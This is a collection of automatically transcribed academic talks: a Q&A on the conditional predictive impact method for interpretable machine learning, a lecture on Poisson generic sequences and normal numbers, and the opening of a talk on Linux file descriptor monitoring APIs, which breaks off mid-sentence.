with. So I'm interested to know whether it's possible to to identify, get some sort of overall identification of the different confounders, as you call them, by combining the results from the different models. I have no idea. I've always had trouble with RF from that point of view. And I wonder if your methodology would be more amenable to that. Actually, that's, I would say that depends on the underlying machine learning method, because our method is kind of post hoc. So you can choose whatever machine learning method you want. You have your model, and you might have already tested it for prediction performance and all that. And then you want to look at the important factors for the prediction, or maybe even interpret the facts in there. Okay. Okay. Time for more questions, please. So just to just to confirm, Marvin, so that you made the package called CPI. And that comes with this publication that you submitted with your colleague, right? Yes. Maybe tell us this package is still not on the ground, but how much is it ready to be used? I just put the link to the chat, if you're interested. I forgot it on the slide, but it's also in the paper. And I think it's ready to use. And is it optimized for large data set? Is it very computational? So the computational part would be the refitting here with the resampling method. But you don't, as I've said, you don't have to refit. So it's not very computational. If you don't have a model which takes very long to predict. So Tom, you know that the random forests can take some time to predict. And for example, neural networks are very fast in prediction. But usually it's not such a big issue. The computation time, the computation time for the resampling, what is an issue is the computation time for the knockoffs. So if you have low dimensional data, it's usually quite fast. But if you have high dimensional data, it takes some time. So for example, on the gene expression data set, it took, I think, 48 hours to calculate the knockoffs without parallel computation and all that. So that could be optimized, but it still took some time. But I think the knockoffs are improving, very much improving, and there will be better knockoff procedures in the future also for high dimensional data. Okay, can you go to slide 12? Sure. So like the new, I mean, the method that you introduced is the one on the right, the right plot. I see that the confidence bands are really narrow, they're more narrow than on the linear model. And so is this also some kind of a like over optimistic confidence intervals, because the lower one is really narrow, I mean, literally like there's no uncertainty. So is there some overfitting happening? That's what I'm trying to ask. Or do you find it, have you done a like a test of the how accurate are the confidence intervals? So actually, these, these are not the confidence intervals, but these are just box plots of simulation replicates. Okay, okay, sorry, then I misunderstood that. And you see that here for the linear model, this one is quite small, and this one is big, and here's the other way around. Actually, I haven't really thought about that. I bought the different, I might have to investigate why here it's always zero, because it could also be always zero here, because this should also be perfect conditional. Started with the typical machine learning tasks. So these benchmarking data sets as post nousing. And but our actually the reason to develop such a method was genetic data. But it turned out, as I've explained that the method is very general. So in general, it makes sense as soon as you have correlated data to use the CPI or in general, the conditional method. And you could ask a researcher and ask, do you have correlations in your data? And I guess it will be hard to find someone who says no. So I would say it's a very, the field of application is very, very broad. So it's maybe not only model agnostic, but also application agnostic. So you but you have to find a knockoff sampler that works with your data. And that's not always easy. So for example, the one for the genome white data, we were lucky that it was already there. So we didn't have to develop it ourselves. But yeah, knock them new knockoffs, new knockoff method or knockoff samples proposed on the time. So it seems to be very reactive, active research topic. So that will then also broaden the scope of the CPI because they completely realize on the knockoffs. It's not working yet for categorical or mixed data, except some special cases like binary variables or on genetic data, it's working with this one specific type of knockoff sampler. But in general, that's a major challenge to solve. It's useful if you have non-linear or high dimensional data. So images, a speech or text and always machine learning is a big plus. But also just for if you have big data sets. And if you if we go back to my genetic example, so what you usually do is the univariate regression model. So you take each genetic variant, calculate the regression model on the outcome, and maybe adjust for some confounders to get an effect estimate. But that completely misses any relations between the genetic variants. That's why we want to use a multivariate method. But to use a multivariate regression won't work because then you have this multi-cognitive issues that you have more variables than observations and the whole modeling the model does not fit. So it's not working. And that's then where machine learning might come into play. But then you have your multivariate model. So you apply your random forest to your genome white data. But then in the end, it's not actually multivariate again, if you have not a conditional importance measure. If you look if you want to look at the importance of the genetic variants, and then and yeah, and that it's one case which can be solved with the the CPI method. The typical examples are as I've explained always on prediction. So and I think these are big implications of machine learning. So for example, you want to do risk prediction, or you want to do personalized medicine and give treatment which is personalized to a specific person. And I think machine learning is very useful for these. But there are also many smaller things which are maybe not so well known or just very specific. So for an example, maybe going back to the genetic example, genetic epidemiology, you use machine learning for risk prediction. So you might have some sequence data or some gene expression data and you want to predict someone's risk for a disease. And you might also want to use interpretability methods as I described to find genetic variants which are associated with the disease. So this is all I think well known and one of the well known applications of machine learning and epidemiology. But they also if you look at in the sequence data, if you look at the bioinformatics tool chain used to pre-process the data, there are so many very, very small steps where also machine learning comes into play. And that's often overlooked. So you often just look at these major prediction applications. But also there's obviously a hype on machine learning. And I think machine learning cannot solve all the problems sometimes start off. So if our goal in the end is to understand the disease or to understand risk factors, we still need statistics and we also still need epidemiology. So machine learning is a tool that can help us but it's not like the AI which solves all the problems for us.
|
Marvin, Computer Engineer and Biostatistician, is the head of the Emmy Noether research group on interpretable machine learning, funded by the German Research Foundation, at the Leibniz Institute for Prevention Research and Epidemiology – BIPS in Bremen, Germany. Since February 2021, he is also Professor of Machine Learning in Statistics at the University of Bremen. He has a research focus on statistical learning and interpretable machine learning and is interested in epidemiological applications to high-dimensional genetic data and longitudinal register data. Marvin is also author of several R packages, including the random forest package ranger. Marvin presented the results of his latest paper, just accepted in Machine Learning journal, explaining the conditional predictive impact (CPI), a model-agnostic interpretable machine learning method which can handle correlated predictor variables and adjust for confounders. The method builds on the knockoff framework of Candès et al. (2018) and works in conjunction with any valid knockoff sampler, supervised learning algorithm, and loss function. Marvin briefly described the method, show selected simulation results and give an example (with R code) of the application. The CPI has been implemented in an R package, cpi, which can be downloaded from this https URL.
|
10.5446/13930 (DOI)
|
I thank you. I thank all of those who are listening. The talk is based on joint work with Yuval Perez and the next slide will explain a little more. So the work is not new. We did this about 20 years ago just before Yuval left Jerusalem to Berkeley. The trigger for this work was a talk at our seminar by Zev Rudnik. He spoke about a joint paper of his with Alexandru Zahrescu on the distribution of spacings between fractional parts of lacunary sequences. As I, it might have been some other work on his on distribution of spacings. My memory is not that good. Over the years I've spoken about this work several times and I apologize to those who have heard this before. I can only remind you of what I heard years ago as part of advice being given to speakers, especially to young speakers. Never underestimate the pleasure that people get in hearing things that they already know. You're probably quite familiar with this. When you go to the concert you often enjoy more hearing a piece of music that you've heard before. In the opposite direction I'm going to recycle what I once included in a long paper that I wrote with the late Dan Rudolph and with Matt Forman. In explanation we can do no better than to quote the historian of science George Sartan. He wrote a multi-volume history of science. As far as scientific matters are concerned I try to say enough to refresh the reader's memory but do not attempt to provide complete explanations which would be equally unbearable to those who know and to those who do not. Okay so after these apologies I'll start with the talk itself. I assume that people know the usual notion of normality and normality is expressed either for points and zero one or for sequences of zeros and ones which represent the point in base two. What it says is that the empirical distribution of the k blocks, these are a block of consecutive digits of length k and the empirical distribution means you count how many times a k block occurs up to the nth digit divided by n and let n tends to infinity when k is fixed. And this should converge to 2 to the minus k which is the Lebesgue measure of these blocks. When you think of the measure preserving transformation of unit interval given by multiplication by two mods one this is the usual notion of generic points and dynamics. I'll come back to that a little bit later and explain a little bit more about that. Borrell more than a hundred years ago in 1909 proved that almost every point in zero one represents a normal sequence and this was the first instance of the strong law of large numbers. Another of the basic theorems in probability is that when you take sums of independent random variables but the probability of each of these random variables is very small is on the order of one over n then this will converge in distribution to a Poisson random variable. This is called the Poisson limit theorem. This is the theorem that you can get you can see this if you take a random book of 500 pages and you count the number of errors on each page then this will and then count how many pages had no errors how many pages had one error how many pages had two errors this usually corresponds to a Poisson distribution assuming that the book has had a reasonable proof read. Here the sums of the independent variables are not normalized by dividing by n. So a natural question to ask is when you see a sequence of zeros and ones can you generate a Poisson random variable out of this and perhaps this can be done in several ways but we were led to the following definition and since everything works just as well when you deal with b digits so we'll work with b digits it's just so what are we going to do we're going to take omega to the k which are the blocks of length k consisting of digits from 0 to k to b minus 1. So the size of this probability space is b to the k and you put the uniform probability measure so each omega gets the mass b to the minus k. On this space we define a random variable after we fix a point in omega to the n in omega to the n okay so I can use can use the little red button or whatever I don't know what you see and we define the random variables m sub k super x of omega and this just counts up to b to the k minus 1 how many times you see omega. You need a little bit more than the first b to the k digits to see this but nonetheless whether or not you count the last blocks is irrelevant and we say that a point is simply Poisson generic if in distribution these random variables converge to the standard Poisson random variable with mean 1. What this means is that we have a sequence of finite probability spaces these are the omega k with their measures and we've defined on them random variables depending on x this is the mk sub m super x sub k convergence and distribution simply means that for all integers the probability that mk super x is equal to j converges to 1 over j factorial e to the minus 1 in particular when j is equal to 0 this is simply e to the minus 1 and that simply means that the proportion of k blocks in the first b to the k digits which do not appear at all is converging to e to the minus 1. So instead of testing all k blocks we're doing something much more mild we're just counting how many times blocks appear. Now why is this interesting? The first thing that we prove is that this kind of innocent looking convergence implies normality it's a stronger condition than normality and I have here an informal proof of this fact this is going I think a little slower than I expected but whatever we manage to do. Begin by showing that sequences that are simply plus on generic or normal. Now here's some good notation x1 super n is the initial block of length n fix a d and an epsilon. You first find an m0 such that for any m bigger than m0 the distribution of d blocks in x0 m is within epsilon of the uniform distribution on omega d. So we're going to be checking d blocks for the normality. You apply the weak law of large numbers to find a k0 so that for any k bigger than k0 the set of omega in omega to the k such that the empirical distribution of d blocks in omega is within epsilon over 10 of mu d satisfies that this measure is one minus epsilon. So you do two things you first find an m such that the distribution of d blocks in x0 m is close and then you want that these d blocks occur with very high frequency. Next you choose an l which is going to be a cutoff so for a standard plus on random variable the probability that you're bigger than l is less than epsilon over 10. The plus on distribution decays very rapidly it's decays like one over l factorial so this doesn't have to be very large and also the cutoff of the expectation it's the same. Now if x is simply plus on generic you find a k1 bigger than this k0 so that the distribution of our random variable is very close to the distribution of y. Now what happens is that when you look at any m bigger than b to the k1 when you compute the distribution of d blocks in x1 m you first choose k so that m is between b to the k and b to the k minus one. Now with frequency of the k blocks that belong to ak, ak was this good set which had a very high measure and in this good set the empirical distribution of d blocks is very good. It's easy to find the disjoint collection of these which covers the same large fraction and you can calculate the distribution of d blocks within these good blocks to get the conclusion. So the idea is that because we know that we're covering our space our space with most of the m blocks with most of these k blocks then we automatically are getting a good distribution of the d we are in normal and because we're doing this in such an explicit way there are classic estimates for the error in the law of large numbers and you can strengthen normality for these simply plus on generic points you can find the sequence tending to infinity so that the distribution of k n blocks in x1 this should be not 2 to the n but b to the n if we're doing yeah this was here I suddenly dropped back to just two digits 10 to the uniform distribution and here we deal with the variational norm I mean this is a refinement that time the clock is running I see and I do have some more things to say so I'm going to continue. Now this notion of simply plus on generic is stronger than normality it's not difficult to see that some normal numbers are not plus on generic already champ pronouns number which consists in concatenating the natural numbers written in base d b one after the other and here the numbers of size b to the k when you get to write these out they appear in the region of indexes where indices where you're at k b to the k this because you're writing them out one after the other each one takes k bits consecutive numbers of k digits are almost identical as k blocks you change the low the the low digits the digits on the right you change them very slowly so there are very long repetitions when you form the statistics of blocks of length k plus log bk this is what we should be checking when we're out at k b to the k we should be checking the logarithm of this number which is k plus the log of k to base b we typically see blocks where the initial string of length log bk coincides with the final string of the same length these are far from being typical and you see mostly typical blocks and so these this just won't work you won't see you'll get the wrong get something very far from a possible distribution and in fact you can do more you can take any normal number and modify it on a zero density sequence you just have to change n blocks on runs of length say twice log n putting twice log n consecutive zeros this is a rare thing for an n block and given as normal number you just change the digits between b to the n and b to the n plus one in blocks of size two n with a periodicity of n over two then you're going to guarantee that any n block has a run of two log n consecutive zeros this is a rare event and but the density of changes is zero and you've killed the you've preserved the normality but you've killed this property property of being plus on generic so our main theorem is that the bagel most every number is simply plus on generic it's not only simply plus on generic it's there's a stronger notion which we'll give in the next slide one of the puzzles and the 20 years have not enabled us to settle this is that we don't know of any explicit construction which will give a simply plus on even a simply plus on generic number that you don't see how many slides I have in the format that I've chosen I have a little more than 20 so we're getting to more or less halfway through those who are worried about where we are in the lecture I mean you don't see the total number here are some references the slides are available I'm not going to say very much about them you can check these references there's lots of work on normality there's a book on this this is a broad subject and we really don't have time to go into a detailed discussion of these things yeah here I made another comment here I made another comment which yeah okay I think I leave you this is a kind of exercise to read and maybe I'll come back to that if we have time at the end so let me get to the definition of plus on generic so far I just showed you how you get to a single plus on random variable with a limit we actually get not just one plus on random variable but we get a plus on point process on the line so this may be a little less familiar and the plus on point process on the line on zero infinity or on minus infinity infinity we'll be discussing just on the half line intuitively intuitively this is a random distribution of points on the line to describe this formally one usually talks about a random integer valued measure y on the line and for any bounded Borel set the value of y of s is a non-negative integer this is just counting the number of points in s if you have disjoint Borel sets then these random variables are mutually independent the number of points in disjoint sets are independent and for each bounded Borel set y of s has the distribution of a plus on random variable with a parameter equal to the Lebesgue measure of s in the formula I gave you before there was no parameter it was one for the parameter you have to put in a lambda to the k over k factorial times e to the minus lambda instead of minus one okay here's what I explained a little more now I'm going to explain how we construct not just random variables on our finite probability space but we're going to use this finite probability space to construct an entire process on the line and the process that we on the line is if you fix the set s you scale it with B to the k and then you count how many times oh the j in this scale set is equal to omega so if s is the unit interval we're simply counting the j from one up to B to the k if it's the interval from 0 to t we would be counting B to the k times t we would be going further in other words we count the number of indices so the pattern appears in the location take a deep breath and swallow this and now now I've said this already and this was Poisson generic and the new definition is that we say it's Poisson generic not simply Poisson generic if we have convergence of these point processes to the standard Poisson point process on the line this convergence in distribution and I'll soon give you a criterion I mean it may not be so clear what you need to do to prove that processes converge but we'll see that on the next slide and the main theorem is that for almost every x in the unit interval these processes defined on these finite probability spaces converge to the standard Poisson process on R standard means that the expected number of points in an interval is simply equal to the length of the interval and to prove the theorem we're going to use a proposition that goes back to Reigny Reigny showed that in order to characterize a Poisson point process on the line to know whether or not it's Poisson it suffices that satisfies two properties one is that the expected number of mks is bounded by the expected number of the Poisson process in our case it would just be the measure of s and the limit that there are no points in s is just the probability that the Poisson process has no points which is just here's the simple example under these two conditions the point okay xk should be mk this x is a typo for m and when you take for s to be the interval from zero to t it's just e to the minus t which is the probability that a Poisson variable with parameter t is equal to zero so this is the main condition that one has to check in the next couple of slides i'm going to in the next couple of slides i'm going to give a brief sketch of how to prove the theorem theorem is a point wise result in statistical mechanics and probability theory these are called quenched results and this is to be distinguished from an annealed result where one randomizes the point x as well as the block omega and the way to prove the theorem is we first prove an annealed version and here's the lemma that states this we now use a much bigger measure space we take product measure on here i put in z it should be n doesn't matter because the x that we're taking is a one-sided sequence so on this bigger probability space the same random variables that we're defining the same process converges to a standard Poisson process and this is the proof of this lemma is more or less standard in this is a kind of standard thing in probability i won't be able to describe to show you the proof of this but this is not a very difficult result and now we have to go past from this annealed result to a quenched result and for this we use a concentration inequality which estimates the error from the average behavior this enables us to prove to apply the usual Borel Cantelli lemma so i give here some more details of the proof of the lemma and let me explain the concentration inequality because that's a less familiar thing a concentration inequality is a generalization of what i referred to as Bernstein's inequality before and it goes like this the specific one that we need is you have independent random variables but now you take some function of these random variables and this function should satisfy the property that if you take two elements which differ in a single coordinate then the function is bounded by c this is a kind of Lipschitz condition and then for any t the probability that the function differs from its expected value differs from its expected value the probability that this deviates by more than t is an exponential in minus t squared over two c squared n so so you see how i think there's a typo here as well the n should be upstairs not downstairs okay so once you have this kind of concentration inequality let me go back two steps once you have this once you have this kind of concentration inequality you know that the probability that we have to we needed to show that this probability is equal to zero for a finite union of intervals we need to show that it's converging to e to the minus t we know that it's doing it a few randomize over x and so what you need is the deviation from that probability to be an error which is sufficiently small so that you can sum over all k when you sum over all k if that sum is finite you can apply the borough cantelli lemma and get that eventually you are not in the error set and you're converging to the correct thing so after this brief discussion of of i i want to pass to a more dynamical point of view and here i'm changing a little bit gears because i now want to focus on the dynamical aspect to this i've already said that uh looking at the transformation t equals bx mod one preserves the big measure one of the classic measure preserving systems although it's not invert in general a point is called the generic point here's the general definition if you have a mapping of a compact space you call a point x0 at the generic point if the ergodic average is converged to the integral the transformation t of x equals b times x this is the usual definition of normal numbers this explains why we call this plus zone generic now from the dynamical point of view dividing into bins or intervals of size b to the minus k is not so natural it's more natural to divide the unit interval into n equal intervals and look at the orbit up to n and therefore we consider the following for each point x we fix x as before now divide n into intervals of length one over n omega now represents a random number from one to n instead of a random block up to b to the k and n n sub n super x of omega counts the number of indices i from one to n such that t to the ix is equal lands in the omega's interval now if you consider omega to be uniformly distributed on the integers from one to n this becomes a random variable our previous m and x was just this but using b to the n and in a similar way you can define a point process you just scale the n up to t and you just count the number of times up to n times t that the orbit lands in this transformation now t to the i is just b to the i we're just using the definition just using the notation now and just using this notation t of x is b times x so with this we now have a new theorem for almost every x we have that this converges to the standard Poisson process and this is a generalization of the previous theorem because if you look at the times b to the k then this is the previous definition and here's the annealed version and the proof goes through the same the same mantra and the proof i was describing before now why did i put this suddenly into a dynamical setting i put this in a dynamical setting because this suggests that instead of multiplication by b we can use other mappings and i think this is the more interesting novelty in our work and the next simplest example you might disagree with this but i i'm thinking of the next simplest example of a hyperbolic system the simplest example of a measure preserving transformation is probably rotation by alpha on the circle but if you want to get some randomness you really need to go to the torus and if you want an invertible transformation and the simplest example is an eucaric otomorphism of the torus this is given by an element of sl2z this is just a two by two integer value matrix with determinant one with eigenvalues that are not roots of unity you need this in order to ensure that the eigenvalues that you have hyperbolic behavior otherwise you have some periodicity it's not an interesting transformation do you know that by a such an otomorphism you could think of the simplest matrix that you like two two one one one for example is probably the simplest one and now fix a point on the torus on the two torus three change divide the torus into n squared equal size square so this is just a checkerboard pattern now omega denotes one of these squares chosen uniformly now we define a process just like we were doing before x is the fixed point n is the length of the orbit t is the parameter for the process and when you evaluate it on this finite probability space which now has n squared elements it's the number of indices between l and n squared such that a to the lx is in omega so the probability this is measure preserving the probability that you land in any square at any given time is exactly one over n square so the expected number of times you land in a given square is one so we now have something which we we're sort of summing we're summing not quite not independent but we're summing n square variables each of them with probability one over n squared we expect that the sum that the sum behaves like a Poisson random variable and as expected for almost every point we can prove that these processes converge to the standard Poisson process on the line now this is already going I think beyond the strengthening of normality that I was emphasizing in the first part of the talk I'm supposed to remember yeah 12 20 okay so there are many papers with Poisson limit laws for dynamical systems these usually concentrate on distribution of return times or visits times of a randomly chosen point to a sequence of sets that shrink down to a fixed point here the basic sample space is the whole torus rather than finite set of n square these are maybe not so familiar and so among the first paper of these type was a paper by Boris Pitzke it was actually published after he passed away he passed away tragically at a young age and a special case of his result I'm going to formulate here that a be hyperbolic toral oremorphism that means that the eigenvalues are not on the unit circle so for a two for the two torus it just means that you have to avoid roots of unity you fix a point in the torus y and then you let the n of y denote the ball of radius r to the n around y r is less than one you take some fixed radius and you start shrinking this now with this fixed point that you've chosen x you look at the number of times that your orbit ai to the x lands in the ball of radius r to the n around y and the time that you go is you take a lambda as a parameter and you divide by the measure of the set m denotes the Lebesgue measure if x is m distributed for m almost every y and m almost every x I should have said that as well I'm sorry x is m distributed for m almost every y y is fixed and x is the random point my x converges in distribution to a cross zone variable with parameter lambda so this is the so the y is fixed and the sample space is the whole torus so this is a kind of a kneeled version now I didn't formulate pitzkel's real theorem his real theorem was for finite state Markov chains and he proved the same kind of result for finite state Markov chains there you don't use simply blocks because blocks don't have equal sizes you use sets that are roughly equal that are defined by blocks of roughly equal length and then to go from the Markov chain theorem to the theorem on hyperbolic torulomorphisms to use the fact that there are geometric Markov partitions for hyperbolic torulomorphisms these are partitions of the torus into piecewise polygons piecewise rectangles and these Markov partitions are used to show that the algebraic torulomorphism is isomorphic to a Markov chain so it behaves measure theoretically just like the Markov chain that you get from this representation so you prove the result for Markov chains then use Markov partitions and approximate the square these balls you approximate them with sets in the Markov chain and with that you prove the pitzkel's theorem so this gives a kind of annealed version of what I was claiming on the previous slide I mean it's not exactly that setting but it's similar enough let's see what happened here I went backwards yes I should be going forward it's pitzkel's theorem okay I've gotten to the final remarks okay this is what I wanted to do excuse me for a second yeah okay I do have another slide yeah okay okay nice nice so there are properties of the class of normal numbers that do not seem to be shared by the class of plus on generic points the simplest is the following so I'm going back to discussing the connection between plus on generic points and normal numbers if from a normal number you get a new one by erasing all the digits with an odd index and then contract things so you just look at the even digits the new number is also known you do this the same with a plus on generic point it's not at all clear that the resulting point is again plus on generic because now we're we've cut down by a half the length so we should be looking at distribution of we're looking at every other so these are blocks of length 2n minus 1 that we've taken every other one and we're looking at this up to 2n and it's not clear at all that this uh with this carries over that you do this sampling and you get another plus on generic point the proof I was sketching that plus on generic implies normality carries over to the dynamical setting that I was describing in the previous slide on the torus with the same kind of proof there's no nothing really needs to be added there I've been talking this whole talk about the plus on limit theorem the central limit theorem is probably more well better known than plus on limit theorem there are also point wise versions of this these are called you take identically to attribute random variables with zero mean variance one you normalize the sum by one over square root j so you're now looking at the deviation you expect this to be zero and you're looking at the deviation on the scale of root j you fix a realization of the sequence and you take the integers from one to n as your sample space then but you sample with a proportion over j so you're taking really uh what is called a logarithmic average then the almost sure central limit theorem is the assertion that z omega n converges to the standard Gaussian so this is uh I point this out just so that you know there are other from almost every point you can almost also get in some natural way Gaussian random variable and they're a point wise plus on limit theorems of the same type which are similar to the theorem of pitzkel that I was describing here you can he was taking some he disconnected the point x from the point y the point he was using to uh you you can use the same point and just look at the return times of an initial n block in a fixed sequence and this converges this has a normal distribution plus on limit theorem a needle for almost every block the probability when you do this off the block is similar to the theorem of pitzkel that I was describing in these cases I don't see how to show that a point which satisfies them is a normal number there's another typo okay I think that I have about a minute left and I will conclude here I don't have a slide saying thank you to everybody but I say thank you to everybody and I see that Robert has returned yes so thank you for your talk I hurryed up to be in time at the end of your lecture and of course I could hear your comments on normal numbers which was of course for me of of interest so thank you very very much and I see also that there is a list of questions already in the chat okay so I can read them do you see it or wait before before that I should have said at some point that one of the papers I think that I was mentioning uh Robert should know because I think he wrote the math review of that paper yeah yeah that's true okay so now I see questions oh yes of Barak uh he asks whether you can read there are a whole bunch of questions yeah other measures he asks instead of what about other measures instead of Lepeg measure instead of Lepeg measure so in principle in principle if you use uh for almost every point have a base two expansion which is Poisson generic oh okay this is a much much subtler problem it's already uh it's already a subtle question it's already a subtle question for normality I mean this is uh this is something we haven't investigated at all I have no idea offhand okay then a bunch of comments by Veronica Pechia okay okay so the subsequence long squares of two and noris is normal our experimental results show that this subsequence could also be Poisson generic beautiful I would be extremely interested in normality of the subsequence was proved by Milner for larger class it could also be Poisson generic yeah this is concerned with these automatic sequences yeah yeah yeah yeah I I know I mean the two or more say I'm familiar with I would be offhand I mean I can't uh I'm happy to see these comments I assume you learned about Poisson generic from some references in some papers of Kamaya but definition can be given with overlapping occurrences of an oh non overlapping does the same hold for the Poisson generic definition we use the overlapping condition in other words we're counting occurrences we're not we're not asking whether or not the uh I don't I don't I don't know I don't think there would be much difference I don't think there would be much difference but but I really don't know I see the Abe sent me a private communication what is how do I see that yeah maybe this is an answer to your comment that she got the information from Kamaya and maybe she says by Zev Rudnik yes yes yes okay okay she heard it from the very okay thank you thank you yeah are there further questions comments see the next one exactly yes okay okay no there is a further one nice okay shoot a piya okay she's typing I'm is there some way I can see her when she's asking these questions or is that maybe I can maybe all uh uh technical uh administrating the background can manage it yes yes and we get the paper with these results uh you'll be the first to get the paper after we get the paper so the moment I try to make Veronica visible but maybe that's not possible uh I don't know yeah in any event Veronica I ah you can see her no no ah now I see her very good okay I'll be happy to send you to put you first on the list once we get the paper written so far 20 years have passed I hope that it won't be another 20 years but uh I at the moment we don't have a real manuscript I mean we've discussed this spoken about it and so on but uh I'll convey to my co-worker your request in hope that this will encourage us to uh uh to write down finally these results although there are some hints I mean there is a I think the paper of Kamaya that I refer to that I mentioned I think that he gives some idea as to what our proofs are because he says that he uses uh some of our ideas to prove what he's doing in that paper so if you haven't looked at Kamaya's papers I would suggest you look there I hope I've given more hints in the talk in it it's really not so difficult it's not okay so uh Veronica do you have other questions no we don't hear you you're muted Veronica we don't hear you you have to unmute I don't have more questions at the moment I will be pleased to send you the statistics on the examples which are wonderful wonderful yeah please do okay so thank you very much and okay
|
I will discuss a criterion for randomness of sequences of zeros and ones which is strictly stronger than normality, butholds for almost every sequence generated by i.i.d. random variables with distribution {1/2, 1/2}. Briefly put, the idea is count the number of times blocks of length n appear in the initial block of length 2n. I will also discuss an extension of this idea to toral automorphisms.
|
10.5446/13946 (DOI)
|
Hi, my name is Stefan Heinetzi and today we're going to talk about the evolution of file descriptor monitoring in Linux. So what is file descriptor monitoring? File descriptor monitoring APIs allow applications to find out which file descriptors are ready to perform I.O. So that could be something like a server that is handling a bunch of different connections and also has a listen socket. Well, it might want to know when a new client connects to its listen socket. It might also need to know when new data arrives on one of the existing established connections. In other cases, you might have, for example, a pipe which has a finite sized write buffer. And if the application fills up that write buffer, it can't write any more data to it until the other side of the pipe, the reader, has read some of that data. And so file descriptor monitoring can let the application know when there's more write buffer space available. In Linux, there are a number of APIs for file descriptor monitoring. These system calls have been added over the years and they have different characteristics. They have different API designs and they have different performance and scalability. So today, what we're going to do is we're going to have a look at these APIs in turn and then we're going to compare them. So applications still use all of these APIs and this is not some functionality that has been obsolete completely in the kernel. So it's still normal to see different applications using different APIs, but that makes it especially interesting to go and look at them and understand their differences so that we can choose which ones to use ourselves. Before we start looking at the actual system call API design and the performance, let's have a look at how file descriptor monitoring works inside the kernel. Inside the kernel, various file descriptor types are implemented. For example, device drivers might have some file types that they have. Of course, file systems also implement file types. And these file types have a pull function. This pull function returns the set of events that are currently available on that file descriptor. So it could be, for example, that the file descriptor is ready for reading. But this pull function also allows the caller to register themselves and receive a wake up when that file finally becomes ready for the events that it is looking for. The exception to this single API that exists inside the kernel is CIGIO. It has its own API. But for the most part, these very different system calls are actually implemented using this one API in the kernel. Now what are the set of events that the kernel knows about and the set of events that it will raise? Here is the table with the most important ones. The read and the write are the very commonly used ones that are used for finding out when a socket has more data to read or, for example, when a pipe can be written to. There are also events for closing file descriptors, in particular for finding out when the other side of a socket or a pipe has been closed. So there is a hang up, an E-PollHOP event, which notifies the application that the socket has been closed. That doesn't mean that the file descriptor is completely finished and no longer useful because there might still be data in the receive buffers that user space can still read before it itself decides to let go of that socket. There are also some file specific events. So this depends on the specific file type. And a driver, for example, might raise this event when something relevant to its file type happens. That's the E-PollPri flag. It's not used very often. There's also an error flag, of course, in case something goes wrong and the application needs to respond in order to handle this file descriptor that's no longer usable. There's some out of band events, which I haven't even shown here because they're quite rare. They're used for TCP connections, which have the concept of sending data outside of the normal stream. And another thing that's interesting to note is that when these file descriptor events occur, they occur at a point in time. By the time that user space gets around to actually, for example, reading from that file descriptor that had something available, it could be that the file descriptor no longer has data available, either because another thread or another process read from it, or maybe something else happened. So it's important for applications to be aware that in some cases maybe they'll receive an event, and when they actually try to respond to that event, things have already changed and moved on. The kernel has the O non-block open flag for files, and it's important to set this this way. If the application finds out the file is ready for reading, and it does the read, but there's actually no data there, then the kernel will return with E again and let the application know there was nothing. By default, file descriptors are not in non-blocking mode, instead the process would actually be put to sleep, so this would hang the application. So it's worth knowing this. Now before we look at the various APIs in detail, I want to still take a step back, and let's remind ourselves why is file descriptor monitoring used at all? Why do applications do this? Let's take an example, say we're implementing a text-based matrix chat client. We have two sources of activity here. The human who is interacting and entering chat messages that they want to send to the chat room on the keyboard, and the second source of activity is the matrix server, which is sending us the messages that remote users have posted to the chat room, and we need to display them. So we have two different things we need to do at the same time, two different IO activities, and one way of implementing this would be to spawn one thread for the terminal, for the TTY, and one thread for the matrix server socket, and those threads could then process any data that becomes available on those file descriptors. The thing with threads though is that you need some coordination for the life cycle of the thread to safely start it and stop it at the appropriate time, and in addition to that, if there are any shared resources in use, for example, the user interface, which has both updates from the keyboard when the user enters a message and updates from the server when new messages appear, we will need to protect that and implement some synchronization or something to make sure that the terminal, the TTY thread, and the matrix server socket thread don't interfere with each other. So this adds complexity. It would be nice if there was a way to avoid having to have this complexity that that multi-threading brings. The final thing to keep in mind with threads is that they're not free. They are resources and they have some amount of overhead. They have a cost associated with them. And this is particularly apparent when you have a server that has many, many thousands or tens of thousands of file descriptors, because each of those threads is going to have a call stack and it's also going to have some kernel resources associated with it. So is there another way, a more lightweight way, a way that doesn't require complex coordination? Yes, there is. One approach is using an event loop. So this is called an event-driven architecture. Instead of making every IOTask a separate thread, we can instead have an event loop and each activity, so for example the terminal, the TTY file descriptor, whenever it becomes ready, that's an event. We wait for the next event, we handle the current event, and then we go back into the loop and we just repeat doing this until the application stops. And in this event loop approach, file descriptor monitoring is what powers this next event function or this next event primitive. We need to have the ability to monitor a set of file descriptors and see which one of them is ready and then we'll let our application handle it. To become a bit more concrete as well, where is this used in the real world? Which applications use file descriptor monitoring? Well, pretty much all GUI applications, all graphical applications tend to do this because GTK, QT, and also other user interface frameworks, even on other platforms, tend to be based on event loops and they tend to monitor file descriptors. That tends to be what powers the core of user interfaces. But it's not just graphical applications. Servers like NGINX, the web server, is a well-known example for an application that uses an event-driven architecture and event loops. You might also hear about thread per core architectures, which are becoming popular for storage and network processing. And the idea there is that you start a thread for each CPU, but then on that CPU, you run an event loop in order to process work. And finally, you might also come across file descriptor monitoring when it's simply used in order to get around limitations of blocking APIs. And what I mean by that is that sometimes you want to read from a file or write from a file or perform some other blocking operation, an operation that can take a long time. And if those system calls do not have timeouts or cancellations, sometimes an approach that people take is they use a file descriptor monitoring API in order to get that functionality so that they can cancel our timeout. Okay. So we've covered the background for what is file descriptor monitoring, why do applications use it, and what are some of the real world examples. Now let's take a look at the select system call. The select system call is the first of the ones we're going to look at because it is the earliest one that's still widely used. It was introduced in 4.2 BSD, so before Linux. And the variant that I'm showing here on this slide is Pselect. This is a newer version of it. It's a POSIX system call, so it's available not just on Linux. And what this system call added on top of the original select is it has a nanosecond timeout and it also has a signal mask. The reason I'm mentioning these things is I'm always going to show you the most powerful and most recent variant of these system call families because they're useful, for example, if you need high resolution timers, you want to make sure to use something that has, say, more than just millisecond or even microsecond resolution. Or if you're using POSIX signals in your application, then being able to control the signal mask while you're in a blocking system call is important because you need to decide when to block and unblock certain signals. Okay, but let's get to the file descriptor monitoring part. So how does select work? The select system call takes up to three bitmaps, these FD sets. And user space will set a bit to one if it wants to monitor that file descriptor number. So for example, say we want to monitor file descriptor number four, then we would have to set the fifth bit in the bitmap to one to tell the kernel we want to monitor file descriptor number four because the bits, right, they're numbered zero, one, two, three, four, and then that's the one that we want to set to one. If we set it to zero, the kernel will not monitor it. And that's how you build these FD set bitmaps. When you call the system call, the kernel will then look at that bitmap, will monitor the file descriptor numbers that you requested. And when a file descriptor becomes ready or when there's a timeout, it will write out a new bitmap. It will overwrite your bitmap. And instead, you'll have a one if the file descriptor was actually ready, or you'll have a 